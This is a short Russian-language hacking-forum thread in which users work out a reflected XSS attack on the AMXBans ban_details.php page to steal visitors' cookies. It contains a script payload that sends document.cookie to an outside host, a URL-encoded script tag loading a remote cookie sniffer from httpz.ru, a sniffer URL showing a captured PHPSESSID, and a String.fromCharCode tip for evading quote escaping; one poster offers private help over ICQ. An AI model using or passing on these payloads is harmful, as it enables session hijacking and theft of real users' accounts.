нужна помощь (пассивная xss?)

http://forum.antichat.ru/thread121710.html

давным давно ничем подобным не занимался - вспоминаю..


Вопрос, собственно: amxbans -> ban_details.php?ban_info[ban_reason]=/javascript_code/ работает частично. alert(document.cookie) проходит.


Пытаюсь подставить <script>img = new Image(); img.src = "website/sniffimage.gif?"+document.cookie;</script> - оно "фильтрует" кавычки. Точнее, экранирует их в \"website/sniffimage.gif\".


Залил простой скрипт (x.js: "<script>alert(hi);</script>") на сервер, пытался достучаться до него посредством <script src=blabla></script> дабы обойтись без кавычек. Не работает.

Подскажите, пжалста, выходы из положения, или хотяб намекните. Благодарю заранее.

 

%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%68%69%29%3B%3C%2F%73%63%72%69%70%74%3E
может так получится, точно незнаю )))

 

Спасибо, url-encode пробовал оба варианта. Не работает..

 

вот еще как можно, на примере моего снифера
%3E%3CSCRIPT%20type=text/javascript%20src=http://httpz.ru/csmxo0306igo.js%3E%3C/SCRIPT%3E

 

Тем-же снффом пользуюсь )..
Оно мне не в лог пишет, а в адресной строке оставляет все куки:

http://httpz.ru/nqk7ksje7ro.gif?PHPSESSID=cefd4708a36ea......

 

так и в логе и там оставляет, можно мне адрес странички с xss в личку, может помогу

 

icq 781954

 

юзай String.fromCharCode

 

%3E%3CSCRIPT%20type=text/javascript%20src=http://httpz.ru/csmxo0306igo.js%3E%3C/SCRIPT%3E
итак всё работает))) только что проверял))) у него что то со снифом наверно или он гонит))